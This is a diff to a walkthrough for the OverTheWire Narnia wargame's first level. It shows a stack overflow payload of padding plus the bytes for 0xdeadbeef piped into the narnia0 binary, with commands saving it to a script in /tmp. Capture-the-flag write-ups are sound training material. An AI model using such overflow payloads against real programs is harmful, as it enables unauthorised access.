msarafos/overthewire/narnia/walkthrough.md

     (echo -e "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde"; cat;)

-Its output need to be provided as input to the program `narnia0`.
-So, after running
+The output of the above command needs to be provided as input to the program `narnia0`.
+So, after running it, one can grab the password for the next level.

     narnia0@gibson:/narnia$ mkdir /tmp/testDirectory && touch /tmp/testDirectory/exploit0.sh
     narnia0@gibson:/narnia$ echo "(echo -e "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde"; cat;)" > /tmp/testDirectory/exploit0.sh